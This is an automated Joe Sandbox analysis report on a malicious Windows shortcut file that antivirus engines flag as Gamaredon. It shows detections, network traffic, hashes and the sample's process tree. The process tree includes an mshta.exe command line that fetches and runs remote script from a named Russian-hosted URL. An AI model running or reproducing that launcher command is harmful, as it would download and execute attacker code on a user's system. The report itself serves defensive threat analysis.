Windows
Analysis Report
442.111).lnk
Overview
General Information
Detection
Score: | 60 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- mshta.exe (PID: 3884 cmdline:
"C:\Window s\System32 \mshta.exe " http://a 0705880.xs ph.ru/sele ction/seed ling.txt / f MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
- cleanup
Click to jump to signature section
AV Detection |
---|
Source: | Avira: |
Source: | ReversingLabs: | |||
Source: | Virustotal: | Perma Link |
Source: | HTTP traffic detected: |
Source: | IP Address: | ||
Source: | IP Address: |
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
System Summary |
---|
Source: | Strings: |
Source: | Key opened: | Jump to behavior |
Source: | ReversingLabs: | ||
Source: | Virustotal: |
Source: | Key opened: | Jump to behavior |
Source: | Classification label: |
Source: | Key value queried: | Jump to behavior |
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Windows Management Instrumentation | Path Interception | Path Interception | Direct Volume Access | OS Credential Dumping | 1 Security Software Discovery | Remote Services | 1 Email Collection | Exfiltration Over Other Network Medium | 2 Non-Application Layer Protocol | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Rootkit | LSASS Memory | 12 System Information Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 12 Application Layer Protocol | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | 1 Remote System Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Ingress Tool Transfer | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
73% | ReversingLabs | Shortcut.Trojan.Gamaredon | ||
61% | Virustotal | Browse | ||
100% | Avira | LNK/YAV.Minerva.AH |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
a0705880.xsph.ru | 141.8.197.42 | true | false | high |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false | high |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
141.8.197.42 | a0705880.xsph.ru | Russian Federation | 35278 | SPRINTHOSTRU | false |
Joe Sandbox Version: | 37.0.0 Beryl |
Analysis ID: | 819396 |
Start date and time: | 2023-03-03 14:24:00 +01:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 4m 46s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of analysed new started processes analysed: | 6 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample file name: | 442.111).lnk |
Original Sample Name: | ( 2201605000000123 09.08.2022 .1 .111).lnk |
Detection: | MAL |
Classification: | mal60.rans.winLNK@1/0@1/1 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, HxTsr.exe, RuntimeBroker.exe, WMIADAP.exe, conhost.exe
- Excluded domains from analysis (whitelisted): client.wns.windows.com, ocos-office365-s2s.msedge.net, client-office365-tas.msedge.net, ctldl.windowsupdate.com, config.edge.skype.com
- Not all processes where analyzed, report is missing behavior information
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
141.8.197.42 | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Panda Stealer | Browse |
| ||
Get hash | malicious | Panda Stealer | Browse |
| ||
Get hash | malicious | CollectorGoomba, Panda Stealer | Browse |
| ||
Get hash | malicious | Amadey RedLine SmokeLoader Tofsee Vidar | Browse |
| ||
Get hash | malicious | Amadey Raccoon RedLine SmokeLoader Tofsee Vidar | Browse |
| ||
Get hash | malicious | Raccoon RedLine SmokeLoader Tofsee Vidar | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | BlackNET | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Poullight | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
SPRINTHOSTRU | Get hash | malicious | DCRat | Browse |
| |
Get hash | malicious | Tofsee | Browse |
| ||
Get hash | malicious | DCRat | Browse |
| ||
Get hash | malicious | Tofsee | Browse |
| ||
Get hash | malicious | SmokeLoader | Browse |
| ||
Get hash | malicious | DCRat | Browse |
| ||
Get hash | malicious | DCRat | Browse |
| ||
Get hash | malicious | Tofsee | Browse |
| ||
Get hash | malicious | Tofsee | Browse |
| ||
Get hash | malicious | Tofsee | Browse |
| ||
Get hash | malicious | Tofsee | Browse |
| ||
Get hash | malicious | Tofsee | Browse |
| ||
Get hash | malicious | Tofsee | Browse |
| ||
Get hash | malicious | Tofsee | Browse |
| ||
Get hash | malicious | Tofsee | Browse |
| ||
Get hash | malicious | Tofsee | Browse |
| ||
Get hash | malicious | Tofsee | Browse |
| ||
Get hash | malicious | Tofsee | Browse |
| ||
Get hash | malicious | Tofsee | Browse |
| ||
Get hash | malicious | Tofsee | Browse |
|
File type: | |
Entropy (8bit): | 2.988124188685584 |
TrID: |
|
File name: | 442.111).lnk |
File size: | 1708 |
MD5: | f46a6211920dd75729aaee4ac9cd0856 |
SHA1: | ff73c02c31e4930c5567ad049cfdf7f7c2ca49ab |
SHA256: | a9916af0476243e6e0dbef9c45b955959772c4d18b7d1df583623e06414e53b7 |
SHA512: | af9a59e5cfa24f9354ad97b5520648f4d116d01e5a42e824cacade6f31eddd795f656bf435f7d33b6946252b262d525e3f3bc8404160f53ebb31a4882754715a |
SSDEEP: | 24:8TS9cDpAQSogbU88ANOs8LA6l4kkDjRo0loIho0eBzabTSymW:8TDkJaAO4DjRoOola3d |
TLSH: | E331E30817941A21E6349D3768DAD20249357406DD82DE3F12D0569CAC23601FB7DCAE |
File Content Preview: | L..................F.... ....OY.r....OY.r....OY.r....6....................../....P.O. .:i.....+00.../C:\...................R.1.....(Sq2..Windows.<........:..(Sq2*.........................W.i.n.d.o.w.s.....V.1......U.&..System32..>........:...U.&*......... |
Icon Hash: | 60ecece4f0e1e9cd |
General | |
---|---|
Relative Path: | |
Command Line Argument: | http://a0705880.xsph.ru/selection/seedling.txt /f |
Icon location: | %systemroot%\system32\mmcndmgr.dll |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Mar 3, 2023 14:24:53.851448059 CET | 49702 | 80 | 192.168.2.5 | 141.8.197.42 |
Mar 3, 2023 14:24:53.907932043 CET | 80 | 49702 | 141.8.197.42 | 192.168.2.5 |
Mar 3, 2023 14:24:53.908152103 CET | 49702 | 80 | 192.168.2.5 | 141.8.197.42 |
Mar 3, 2023 14:24:53.926029921 CET | 49702 | 80 | 192.168.2.5 | 141.8.197.42 |
Mar 3, 2023 14:24:53.980174065 CET | 80 | 49702 | 141.8.197.42 | 192.168.2.5 |
Mar 3, 2023 14:24:53.980340958 CET | 80 | 49702 | 141.8.197.42 | 192.168.2.5 |
Mar 3, 2023 14:24:53.980370998 CET | 80 | 49702 | 141.8.197.42 | 192.168.2.5 |
Mar 3, 2023 14:24:53.980396986 CET | 80 | 49702 | 141.8.197.42 | 192.168.2.5 |
Mar 3, 2023 14:24:53.980509996 CET | 49702 | 80 | 192.168.2.5 | 141.8.197.42 |
Mar 3, 2023 14:24:53.983545065 CET | 49702 | 80 | 192.168.2.5 | 141.8.197.42 |
Mar 3, 2023 14:24:53.984415054 CET | 49702 | 80 | 192.168.2.5 | 141.8.197.42 |
Mar 3, 2023 14:24:54.037781954 CET | 80 | 49702 | 141.8.197.42 | 192.168.2.5 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Mar 3, 2023 14:24:53.775871038 CET | 49177 | 53 | 192.168.2.5 | 8.8.8.8 |
Mar 3, 2023 14:24:53.809000015 CET | 53 | 49177 | 8.8.8.8 | 192.168.2.5 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Mar 3, 2023 14:24:53.775871038 CET | 192.168.2.5 | 8.8.8.8 | 0x9915 | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Mar 3, 2023 14:24:53.809000015 CET | 8.8.8.8 | 192.168.2.5 | 0x9915 | No error (0) | 141.8.197.42 | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.5 | 49702 | 141.8.197.42 | 80 | C:\Windows\System32\mshta.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Mar 3, 2023 14:24:53.926029921 CET | 92 | OUT | |
Mar 3, 2023 14:24:53.980340958 CET | 93 | IN | |
Mar 3, 2023 14:24:53.980370998 CET | 93 | IN |
Target ID: | 0 |
Start time: | 14:24:52 |
Start date: | 03/03/2023 |
Path: | C:\Windows\System32\mshta.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7e8ff0000 |
File size: | 14848 bytes |
MD5 hash: | 197FC97C6A843BEBB445C1D9C58DCBDB |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |